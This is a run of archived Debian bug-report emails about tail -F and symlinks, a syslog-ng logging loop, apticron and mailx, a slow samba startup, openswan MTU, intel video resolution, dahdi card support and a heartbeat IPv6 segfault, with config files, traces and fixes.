Package: coreutils Version: 5.2.1-2.1 Severity: important i use the following command to print my mail logs on my desktop. ssh -t mailserver.domain.tld "tail -F /var/log/mail.log" | xrootconsole -geo 210x51+0+512 -fn 6x10 -fg green --wrap Having /var/log/mail.log a symlink to /var/log/mail/mail.log When logrotate rotates the logs, tail does not try to reopen the file. Thanks for the fix. Laurent -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-p5ad2e-v7 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Versions of packages coreutils depends on: ii libacl1 2.2.36-1 Access control list shared library hi libc6 2.3.6-7GNU C Library: Shared libraries coreutils recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#364273: coreutils: /usr/bin/tail with -F fails to reopen when pointed to a symlink
Bob Proulx wrote: Laurent CARON wrote: Package: coreutils Version: 5.2.1-2.1 Severity: important That would be a testing version uploaded on 2005-09-04 but should mostly be the same as the stable Sarge version. Not having 5.2.1-2.1 handy I tested using 5.2.1-2 from Sarge. i use the following command to print my mail logs on my desktop. ssh -t mailserver.domain.tld "tail -F /var/log/mail.log" | xrootconsole -geo 210x51+0+512 -fn 6x10 -fg green --wrap Okay. Having /var/log/mail.log a symlink to /var/log/mail/mail.log Did /var/log/mail.log become a symlink in Sid when I was not looking? What do these say? no, it is a custom setup ssh mailserver.domain.tld tail --version tail (coreutils) 5.2.1 ssh mailserver.domain.tld cat /etc/debian_version testing/unstable -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#349697: syslog-ng: Logs infinitely the same message when priority is crit
Package: syslog-ng Version: 1.9.8 Severity: critical Justification: breaks the whole system Installed latest syslog-ng from unstable. When an event of priority crit is logged it is repeated until /var/log/syslog reaches 2Gb (2048Mb), and then the syslog-ng process dies. Reverted to latest stable version, all is now fine. Strange thing is it only happens on one of my computers. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.13-a7n Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages syslog-ng depends on: ii libc6 2.3.5-12 GNU C Library: Shared libraries an ii util-linux2.12r-5Miscellaneous system utilities Versions of packages syslog-ng recommends: ii logrotate 3.7.1-2Log rotation utility -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#349697: syslog-ng: Logs infinitely the same message when priority is crit
Steve Langasek a écrit : On Tue, Jan 24, 2006 at 07:20:50PM +0100, Laurent CARON wrote: Package: syslog-ng Version: 1.9.8 Severity: critical Justification: breaks the whole system Installed latest syslog-ng from unstable. When an event of priority crit is logged it is repeated until /var/log/syslog reaches 2Gb (2048Mb), and then the syslog-ng process dies. Are you sure that this is a single event being logged repeatedly, as opposed to repeated critical events? yes when issuing logger -p crit junk Reverted to latest stable version, all is now fine. So after reverting, you're getting a single critical event logged? yes Strange thing is it only happens on one of my computers. All running the same version, and all receiving critical events? yes syslog-ng.conf attached # # Configuration file for syslog-ng under Debian # # attempts at reproducing default syslog behavior # the standard syslog levels are (in descending order of priority): # emerg alert crit err warning notice info debug # the aliases "error", "panic", and "warn" are deprecated # the "none" priority found in the original syslogd configuration is # only used in internal messages created by syslogd ## # options options { # disable the chained hostname format in logs # (default is enabled) chain_hostnames(0); # the time to wait before a died connection is re-established # (default is 60) time_reopen(10); # the time to wait before an idle destination file is closed # (default is 60) time_reap(360); # the number of lines buffered before written to file # you might want to increase this if your disk isn't catching with # all the log messages you get or if you want less disk activity # (say on a laptop) # (default is 0) #sync(0); # the number of lines fitting in the output queue log_fifo_size(65536); # enable or disable directory creation for destination files create_dirs(yes); # default owner, group, and permissions for log files # (defaults are 0, 0, 0600) #owner(root); group(adm); perm(0640); # default owner, group, and permissions for created directories # (defaults are 0, 0, 0700) #dir_owner(root); #dir_group(root); dir_perm(0755); # enable or disable DNS usage # syslog-ng blocks on DNS queries, so enabling DNS may lead to # a Denial of Service attack # (default is yes) use_dns(yes); keep_hostname(yes); # maximum length of message in bytes # this is only limited by the program listening on the /dev/log Unix # socket, glibc can handle arbitrary length log messages, but -- for # example -- syslogd accepts only 1024 bytes # (default is 2048) #log_msg_size(2048); }; ## # sources # all known message sources source s_all { # message generated by Syslog-NG internal(); # standard Linux log source (this is the default place for the syslog() # function to send logs to) unix-stream("/dev/log"); # messages from the kernel file("/proc/kmsg" log_prefix("kernel: ")); # use the following line if you want to receive remote UDP logging messages # (this is equivalent to the "-r" syslogd flag) udp(); }; ## # destinations # some standard log files destination df_auth { file("/var/log/auth.log"); }; destination df_syslog { file("/var/log/syslog"); }; destination df_cron { file("/var/log/cron.log"); }; destination df_daemon { file("/var/log/daemon.log"); }; destination df_kern { file("/var/log/kern.log"); }; destination df_lpr { file("/var/log/lpr.log"); }; destination df_mail { file("/var/log/mail.log"); }; destination df_user { file("/var/log/user.log"); }; destination df_uucp { file("/var/log/uucp.log"); }; # these files are meant for the mail system log files # and provide re-usable destinations for {mail,cron,...}.info, # {mail,cron,...}.notice, etc. destination df_facility_dot_info { file("/var/log/$FACILITY.info"); }; destination df_facility_dot_notice { file("/var/log/$FACILITY.notice"); }; destination df_facility_dot_warn { file("/var/log/$FACILITY.warn"); }; destination df_facility_dot_err { file("/var/log/$FACILITY.err"); }; destination df_facility_dot_crit { file("/var/log/$FACILITY.crit"); }; # these files are meant for the news system, and are kept separated # because they should be owned by "news" instead of "root" destination df_news_dot_notice { file("/var/log/news/news.notice" owner("news")); }; des
Bug#349697: syslog-ng: Logs infinitely the same message when priority is crit
SZALAY Attila a écrit : Hi! On Tue, 2006-01-24 at 19:20 +0100, Laurent CARON wrote: When an event of priority crit is logged it is repeated until /var/log/syslog reaches 2Gb (2048Mb), and then the syslog-ng process dies. Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:21 gw syslog-ng[18178]: SIGTERM received, terminating; Jan 24 19:18:15 gw lcaron: a Jan 24 19:18:21 gw syslog-ng[18178]: syslog-ng shutting down; version='1.9.8' Jan 24 19:18:15 gw lcaron: a Jan 24 19:19:00 gw syslog-ng[18232]: syslog-ng starting up; version='1.9.8' Jan 24 19:19:01 gw /USR/SBIN/CRON[18234]: (lcaron) CMD (/usr/bin/fetchmail >/dev/null 2>&1) Jan 24 19:19:01 gw /USR/SBIN/CRON[18236]: (root) CMD (/opt/mbm.sh >/dev/null 2>/dev/null) Jan 24 19:19:03 gw lcaron: a Jan 24 19:19:09 gw lcaron: b Jan 24 19:19:21 gw syslog-ng[18232]: SIGTERM received, terminating; Jan 24 19:19:21 gw syslog-ng[18232]: syslog-ng shutting down; version='1.9.8' Jan 24 19:21:14 gw syslog-ng[18830]: syslog-ng version 1.6.9 starting Jan 24 19:21:14 gw syslog-ng[18830]: Changing permissions on special file /dev/xconsole i killed the process there. Could you send me a small :)) part of the log file and the config? Is there any difference between a good machine and the bad one? # # Configuration file for syslog-ng under Debian # # attempts at reproducing default syslog behavior # the standard syslog levels are (in descending order of priority): # emerg alert crit err warning notice info debug # the aliases "error", "panic", and "warn" are deprecated # the "none" priority found in the original syslogd configuration is # only used in internal messages created by syslogd ## # options options { # disable the chained hostname format in logs # (default is enabled) chain_hostnames(0); # the time to wait before a died connection is re-established # (default is 60) time_reopen(10); # the time to wait before an idle destination file is closed # (default is 60) time_reap(360); # the number of lines buffered before written to file # you might want to increase this if your disk isn't catching with # all the log messages you get or if you want less disk activity # (say on a laptop) # (default is 0) #sync(0); # the number of lines fitting in the output queue log_fifo_size(65536); # enable or disable directory creation for destination files create_dirs(yes); # default owner, group, and permissions for log files # (defaults are 0, 0, 0600) #owner(root); group(adm); perm(0640); # default owner, group, and permissions for created directories # (defaults are 0, 0, 0700) #dir_owner(root); #dir_group(root); dir_perm(0755); # enable or disable DNS usage # syslog-ng blocks on DNS queries, so enabling DNS may lead to # a Denial of Service attack # (default is yes) use_dns(yes); keep_hostname(yes); # maximum length of message in bytes # this is only limited by the program listening on the /dev/log Unix # socket, glibc can handle arbitrary length log messages, but -- for # example -- syslogd accepts only 1024 bytes # (default is 2048) #log_msg_size(2048); }; ## # sources # all known message sources source s_all { # message generated by Syslog-NG internal(); # standard Linux log source (this is the default place for the syslog() # function to send logs to) unix-stream("/dev/log"); # messages from the kernel file("/proc/kmsg" log_prefix("kernel: ")); # use the following line if you want to receive remote UDP logging messages # (this is equivalent to the
Bug#349697: syslog-ng: Logs infinitely the same message when priority is crit
SZALAY Attila a écrit : Hi! On Wed, 2006-01-25 at 09:27 +0100, Laurent CARON wrote: # # filter f_attention { level(err .. emerg); }; destination buckrogers { udp("buckrogers"); }; log { source(s_all); filter(f_attention); destination(buckrogers); }; # The problem is with the destination above. Sadly syslog-ng 1.9 cannot resolve host names, so you can only use address not host name. It seems to be a big point (to me). Is it a bug, feature ? And because of this (and with kernel magic) all messages to this destionation goes to 127.0.0.1 and syslog-ng will read it again. :( I put this into the inner bug system with ticket ID 8174. I don't close this bug, but I going to lover it's severity a bit if you accept it. (This only can happen if you listen in wild and try to send somewhere too.) Yes, you can lower it, but not too much as it can bring the entire system down, and fill disk space.. Laurent
Bug#567820: closed by Tiago Bortoletto Vaz (Fixed already)
On 09/02/2010 18:06, Debian Bug Tracking System wrote: This is an automatic notification regarding your Bug report which was filed against the apticron package: #567820: apticron: Apticron fails with Content-type: text/plain; charset=UTF-8: No such file or directory when *not* using bsd-mailx as mailx It has been closed by Tiago Bortoletto Vaz. Their explanation is attached below along with your original report. If this explanation is unsatisfactory and you have not received a better one in a separate message then please contact Tiago Bortoletto Vaz by replying to this email. Hi, It means the bug won't be fixed in stable ? -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#567820: apticron: Apticron fails with Content-type: text/plain; charset=UTF-8: No such file or directory when *not* using bsd-mailx as mailx
Package: apticron Version: 1.1.27 Severity: normal Hi, After apticron's run, i did notice mails only containing: Content-type: text/plain; charset=UTF-8: No such file or directory It seems to be caused by mailx. mailx on my system was heirloom mailx, and I had to enable bsd-mailx to solve it. update-alternatives --set mailx /usr/bin/bsd-mailx Thanks -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-p390 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages apticron depends on: ii apt0.7.20.2+lenny1 Advanced front-end for dpkg ii bsd-mailx 8.1.2-0.20071201cvs-3 A simple mail user agent ii debconf [debconf-2 1.5.24Debian configuration management sy ii ucf3.0016Update Configuration File: preserv Versions of packages apticron recommends: ii apt-listchanges 2.83 package change history notificatio ii iproute 20080725-2 networking and traffic control too apticron suggests no packages. -- debconf information: apticron/notification: root -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#516033: samba: SAMBA is really slow since lenny's dist-upgrade from etch
Package: samba Version: 2:3.2.5-4 Severity: important Hi, After having upgraded from etch to lenny my samba server takes up to 10 mins to start. eg: gw:~# ps aux | grep smb root 10342 0.0 0.0 164956 1416 ?Ss Feb17 0:00 /usr/sbin/smbd -D root 10348 0.0 0.0 164956 1064 ?SFeb17 0:00 /usr/sbin/smbd -D root 30135 0.0 0.0 92076 860 pts/1R+ 20:16 0:00 grep smb gw:~# ps aux | grep nmb root 7107 0.0 0.0 144188 1828 ?Ss Feb17 0:01 /usr/sbin/nmbd -D root 30138 0.0 0.0 92080 936 pts/1S+ 20:16 0:00 grep nmb gw:~# time /etc/init.d/samba restart Stopping Samba daemons: nmbd smbd. Starting Samba daemons: nmbd smbd. real6m21.638s user0m0.020s sys 0m0.048s gw:~# -- System Information: Debian Release: 5.0 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.2-p390-20090127 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages samba depends on: ii adduser 3.110 add and remove users and groups ii debconf [debconf-2.0 1.5.24 Debian configuration management sy ii libacl1 2.2.47-2Access control list shared library ii libattr1 1:2.4.43-2 Extended attribute shared library ii libc62.7-18 GNU C Library: Shared libraries ii libcomerr2 1.41.3-1common error description library ii libcups2 1.3.8-1lenny4.1 Common UNIX Printing System(tm) - ii libgnutls26 2.4.2-6 the GNU TLS library - runtime libr ii libkrb53 1.6.dfsg.4~beta1-5 MIT Kerberos runtime libraries ii libldap-2.4-22.4.11-1OpenLDAP libraries ii libpam-modules 1.0.1-5 Pluggable Authentication Modules f ii libpam-runtime 1.0.1-5 Runtime support for the PAM librar ii libpam0g 1.0.1-5 Pluggable Authentication Modules l ii libpopt0 1.14-4 lib for parsing cmdline parameters ii libtalloc1 1.2.0~git20080616-1 hierarchical pool based memory all ii libwbclient0 2:3.2.5-4 client library for interfacing wit ii logrotate3.7.1-5 Log rotation utility ii lsb-base 3.2-20 Linux Standard Base 3.2 init scrip ii procps 1:3.2.7-11 /proc file system utilities ii samba-common 2:3.2.5-4 Samba common files used by both th ii update-inetd 4.31inetd configuration file updater ii zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime samba recommends no packages. Versions of packages samba suggests: pn ldb-tools (no description available) ii openbsd-inetd [inet-superse 0.20080125-2 The OpenBSD Internet Superserver pn smbldap-tools (no description available) -- debconf information: samba/tdbsam: false samba/generate_smbpasswd: true samba/run_mode: daemons -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#516033: samba: SAMBA is really slow since lenny's dist-upgrade from etch
Steve Langasek wrote: No such problem here. Please run 'sh -x /etc/init.d/samba restart' as a first step to see where this time is being spent. Hi, + RUN_MODE=daemons + '[' -r /etc/default/samba ']' + . /etc/default/samba ++ RUN_MODE=daemons + PIDDIR=/var/run/samba + NMBDPID=/var/run/samba/nmbd.pid + SMBDPID=/var/run/samba/smbd.pid + unset TMPDIR + test -x /usr/sbin/nmbd -a -x /usr/sbin/smbd + . /lib/lsb/init-functions ++ FANCYTTY= ++ '[' -e /etc/lsb-base-logging.sh ']' ++ true + case "$1" in + /etc/init.d/samba stop Stopping Samba daemons: nmbd smbd. + sleep 1 + /etc/init.d/samba start Starting Samba daemons: nmbd smbd. + exit 0 -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#516033: samba: SAMBA is really slow since lenny's dist-upgrade from etch
Steve Langasek wrote: Sorry, I should have been more explict - which of these lines is the last one printed, before the script pauses for this long time? It is pausing for more than 6 mins right after "Starting Samba daemons: nmbd smbd" gw:~# sh -x /etc/init.d/samba restart + RUN_MODE=daemons + '[' -r /etc/default/samba ']' + . /etc/default/samba ++ RUN_MODE=daemons + PIDDIR=/var/run/samba + NMBDPID=/var/run/samba/nmbd.pid + SMBDPID=/var/run/samba/smbd.pid + unset TMPDIR + test -x /usr/sbin/nmbd -a -x /usr/sbin/smbd + . /lib/lsb/init-functions ++ FANCYTTY= ++ '[' -e /etc/lsb-base-logging.sh ']' ++ true + case "$1" in + /etc/init.d/samba stop Stopping Samba daemons: nmbd smbd. + sleep 1 + /etc/init.d/samba start Starting Samba daemons: nmbd smbd Laurent -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#520671: openswan: Unable to specify a specific MTU on a vpn tunnel
Package: openswan Severity: wishlist Hi, It sould really be a nice feature to be able to specify & lock the mtu for a specific tunnel when having issues at some ISPs. For the time being I had to override the mtu in /usr/lib/ipsec/_updown parms3="$parms3 mtu lock 1412" Thanks Laurent -- System Information: Debian Release: squeeze/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27.7-icc-20081122 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#516033: [Pkg-samba-maint] Bug#516033: samba: SAMBA is really slow since lenny's dist-upgrade from etch
Christian Perrier wrote: Quoting Steve Langasek (vor...@debian.org): On Thu, Feb 19, 2009 at 11:32:28PM +0100, Laurent CARON wrote: Steve Langasek wrote: Sorry, I should have been more explict - which of these lines is the last one printed, before the script pauses for this long time? It is pausing for more than 6 mins right after "Starting Samba daemons: nmbd smbd" Ok. Can you please set 'debug level = 4' in your smb.conf, restart samba again, and send us a copy of both your smb.conf and your /var/log/samba/log.smbd? Ping ? Hi, My mistake. I did just diagnose the bug today. There is an old cups reference from the old machine to cups on this config file resulting in: [2009/03/21 20:54:01, 4] param/loadparm.c:lp_load_ex(8822) pm_process() returned Yes [2009/03/21 20:54:01, 3] param/loadparm.c:lp_add_ipc(5929) adding IPC service [2009/03/21 20:54:01, 3] printing/pcap.c:pcap_cache_reload(116) reloading printcap cache [2009/03/21 20:57:10, 0] printing/print_cups.c:cups_connect(68) Unable to connect to CUPS server localhost:631 - Connexion terminée par expiration du délai d'attente [2009/03/21 20:57:10, 3] printing/pcap.c:pcap_cache_reload(223) reload status: error [2009/03/21 20:57:10, 3] printing/pcap.c:pcap_cache_reload(116) reloading printcap cache [2009/03/21 21:00:19, 0] printing/print_cups.c:cups_connect(68) Unable to connect to CUPS server localhost:631 - Connexion terminée par expiration du délai d'attente [2009/03/21 21:00:19, 3] printing/pcap.c:pcap_cache_reload(223) reload status: error [2009/03/21 21:00:19, 2] lib/interface.c:interpret_interface(457) interpret_interface: using netmask value 8 from config file on interface lo [2009/03/21 21:00:19, 2] lib/interface.c:add_interface(337) added interface lo ip=127.0.0.1 bcast=127.255.255.255 netmask=255.0.0.0 [2009/03/21 21:00:19, 2] lib/interface.c:add_interface(337) adding "load printers = no" fixes it Thanks Laurent -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#606720: xserver-xorg-video-intel: Resolution is limited to 1280x1024 on vaio z13 instead of 1920x1080
On 11/12/2010 10:03, Julien Cristau wrote: On Sat, Dec 11, 2010 at 08:08:41 +0100, Laurent CARON wrote: Package: xserver-xorg-video-intel Version: 2:2.13.0-4 Severity: important Hi, After upgrading from 2:2.13.0-4 to 2:2.13.0-2 the screen resolution doesn't go to 1920x1080 anymore. You need to set CONFIG_DRM_I915_KMS=y in your kernel configuration. If I set it once the kernel is loaded, the screen is just black. The laptop is however accessible over SSH. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#601807: heartbeat: Segfault while using a failover IPv6 address
On 07/11/2010 12:02, Laurent CARON wrote: On 07/11/2010 02:27, Simon Horman wrote: On Sat, Nov 06, 2010 at 08:07:13PM +0100, Laurent CARON wrote: On 30/10/2010 08:54, Simon Horman wrote: On Sat, Oct 30, 2010 at 08:18:33AM +0200, Laurent Caron wrote: On Sat, Oct 30, 2010 at 02:11:57PM +0900, Simon Horman wrote: On Fri, Oct 29, 2010 at 10:54:55PM +0200, Laurent Caron wrote: could you give a little bit more detail on the configuration that you have that segfaults? Hi Simon, Here you go: $ /etc/ha.d/resource.d/IPv6addr abcd:abc:abc:a::b/64/bond0 start *** glibc detected *** /usr/lib/ocf/resource.d//heartbeat/IPv6addr: free(): invalid next size (fast): 0x006042b0 *** [ snip ] Thanks Hi Simon, Do you have any input on this ? Hi, I haven't had time to look into this. But I would start by seeing if the bug has been fixed upstream - I seem to recall a fix for a problem like this. Did check it: http://rpmfind.net/linux/RPM/opensuse/11.3/x86_64/heartbeat-resources-2.99.3-18.2.x86_64.html * Wed Jan 21 2009 l...@suse.de - RA: IPv6addr: Fix crash on x86_64 (LF#2034). Can you please push this fix to the debian package ? Thanks Hi Simon, Did you update the debian package with the IPv6 patch ? Thanks Laurent -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#600839: dahdi-source (1:2.3.0.1+dfsg-1) doesn't run specific card (patch included)
Package: dahdi-source Version: 1:2.3.0.1+dfsg-1 Severity: wishlist Hi, ISDN controller: Cologne Chip Designs GmbH ISDN network Controller [HFC-4S] (rev 01) is not supported by the current dahdi. { 0x1397, 0x08b4, 0x1397, 0xb762, 0, 0, (unsigned long)&hfc4s_BN }, added is enough to make it work. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.35.7-dc7700 (SMP w/2 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) (ignored: LC_ALL set to fr...@euro) Shell: /bin/sh linked to /bin/bash Versions of packages dahdi-source depends on: ii bzip2 1.0.5-6high-quality block-sorting file co ii debhelper 8.0.0 helper programs for debian/rules ii module-assistant 0.11.3 tool to make module package creati Versions of packages dahdi-source recommends: ii dahdi-linux 1:2.3.0.1+dfsg-1 DAHDI telephony interface - Linux dahdi-source suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#600839: dahdi-source (1:2.3.0.1+dfsg-1) doesn't run specific card (patch included)
On 20/10/2010 18:37, Tzafrir Cohen wrote: I see that this is not yet included upstream. What card is it, exactly? How does it show on lspci -v ? Hi, 04:04.0 ISDN controller: Cologne Chip Designs GmbH ISDN network Controller [HFC-4S] (rev 01) Subsystem: Cologne Chip Designs GmbH Device b762 Flags: medium devsel, IRQ 16 I/O ports at 2000 [size=8] Memory at df90 (32-bit, non-prefetchable) [size=4K] Capabilities: [40] Power Management version 2 Kernel driver in use: wcb4xxp Kernel modules: hfcmulti, wcb4xxp This is the card: beroNet BN4S0e PCI Express 4x S0 Karte http://www.voipango.de/ISDN-Interfaces/beroNet/PCI-Express-BRI-S0/beroNet-BN4S0e-PCI-Express-4x-S0-Karte.html Thanks for your help. Laurent -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#601807: heartbeat: Segfault while using a failover IPv6 address
Package: heartbeat Version: 2.1.3-6lenny4 Severity: grave Justification: renders package unusable Hi, Heartbeat doesn't seem to play nice with ipv6. It segfaults while trying to add an IPv6 address. -- System Information: Debian Release: 5.0.6 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.35.420100909 (SMP w/8 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) (ignored: LC_ALL set to fr...@euro) Shell: /bin/sh linked to /bin/bash Versions of packages heartbeat depends on: ii adduser 3.110add and remove users and groups ii gawk1:3.1.5.dfsg-4.1 GNU awk, a pattern scanning and pr ii iproute 20080725-2 networking and traffic control too ii iputils-ping3:20071127-1+lenny1 Tools to test the reachability of ii libbz2-1.0 1.0.5-1+lenny1 high-quality block-sorting file co ii libc6 2.7-18lenny4 GNU C Library: Shared libraries ii libcurl37.18.2-8lenny4 Multi-protocol file transfer libra ii libglib2.0-02.16.6-3 The GLib library of C routines ii libgnutls26 2.4.2-6+lenny2 the GNU TLS library - runtime libr ii libltdl31.5.26-4+lenny1 A system independent dlopen wrappe ii libncurses5 5.7+20081213-1 shared libraries for terminal hand ii libnet1 1.1.2.1-2library for the construction and h ii libopenhpi2 2.12.0-1 OpenHPI libraries (runtime and sup ii libpam-runtime 1.0.1-7 Runtime support for the PAM librar ii libpam0g1.0.1-7 Pluggable Authentication Modules l ii libsnmp15 5.4.1~dfsg-12SNMP (Simple Network Management Pr ii libssl0.9.8 0.9.8g-15+lenny8 SSL shared libraries ii libuuid11.41.3-1 universally unique id library ii libwrap07.6.q-16 Wietse Venema's TCP wrappers libra ii libxml2 2.6.32.dfsg-5+lenny1 GNOME XML library ii libxml2-utils 2.6.32.dfsg-5+lenny1 XML utilities ii mawk1.3.3-11.1 a pattern scanning and text proces ii psmisc 22.6-1 Utilities that use the proc filesy ii python 2.5.2-3 An interactive high-level object-o ii python-central 0.6.8register and build utility for Pyt ii zlib1g 1:1.2.3.3.dfsg-12compression library - runtime Versions of packages heartbeat recommends: ii iptables 1.4.2-6administration tools for packet fi ii logrotate 3.7.1-5Log rotation utility ii syslog-ng [system-log-daemon] 2.0.9-4.1 Next generation logging daemon heartbeat suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#601807: heartbeat: Segfault while using a failover IPv6 address
On Sat, Oct 30, 2010 at 02:11:57PM +0900, Simon Horman wrote: > On Fri, Oct 29, 2010 at 10:54:55PM +0200, Laurent Caron wrote: > could you give a little bit more detail on the configuration > that you have that segfaults? Hi Simon, Here you go: $ /etc/ha.d/resource.d/IPv6addr abcd:abc:abc:a::b/64/bond0 start *** glibc detected *** /usr/lib/ocf/resource.d//heartbeat/IPv6addr: free(): invalid next size (fast): 0x006042b0 *** === Backtrace: = /lib/libc.so.6[0x7f4f800b09a8] /lib/libc.so.6(cfree+0x76)[0x7f4f800b2ab6] /usr/lib/libnet.so.1(libnet_write+0x10b)[0x7f4f8110ab6b] /usr/lib/ocf/resource.d//heartbeat/IPv6addr[0x401fce] /usr/lib/ocf/resource.d//heartbeat/IPv6addr[0x402710] /lib/libc.so.6(__libc_start_main+0xe6)[0x7f4f8005b1a6] /usr/lib/ocf/resource.d//heartbeat/IPv6addr[0x401539] === Memory map: 0040-00404000 r-xp 09:01 2777275 /usr/lib/ocf/resource.d/heartbeat/IPv6addr 00603000-00604000 rw-p 3000 09:01 2777275 /usr/lib/ocf/resource.d/heartbeat/IPv6addr 00604000-00625000 rw-p 00:00 0 [heap] 7f4f7800-7f4f78021000 rw-p 00:00 0 7f4f78021000-7f4f7c00 ---p 00:00 0 7f4f7eb34000-7f4f7eb4a000 r-xp 09:01 3579907 /lib/libgcc_s.so.1 7f4f7eb4a000-7f4f7ed4a000 ---p 00016000 09:01 3579907 /lib/libgcc_s.so.1 7f4f7ed4a000-7f4f7ed4b000 rw-p 00016000 09:01 3579907 /lib/libgcc_s.so.1 7f4f7ed4b000-7f4f7ed61000 r-xp 09:01 3580257 /lib/libpthread-2.7.so 7f4f7ed61000-7f4f7ef61000 ---p 00016000 09:01 3580257 /lib/libpthread-2.7.so 7f4f7ef61000-7f4f7ef63000 rw-p 00016000 09:01 3580257 /lib/libpthread-2.7.so 7f4f7ef63000-7f4f7ef67000 rw-p 00:00 0 7f4f7ef67000-7f4f7efe9000 r-xp 09:01 3580231 /lib/libm-2.7.so 7f4f7efe9000-7f4f7f1e8000 ---p 00082000 09:01 3580231 /lib/libm-2.7.so 7f4f7f1e8000-7f4f7f1ea000 rw-p 00081000 09:01 3580231 /lib/libm-2.7.so 7f4f7f1ea000-7f4f7f212000 r-xp 09:01 2660238 /usr/lib/libpcre.so.3.12.1 7f4f7f212000-7f4f7f411000 ---p 00028000 09:01 2660238 /usr/lib/libpcre.so.3.12.1 7f4f7f411000-7f4f7f412000 rw-p 00027000 09:01 2660238 /usr/lib/libpcre.so.3.12.1 7f4f7f412000-7f4f7f419000 r-xp 09:01 7045179 /usr/lib/libpils.so.1.0.0 7f4f7f419000-7f4f7f619000 ---p 7000 09:01 7045179 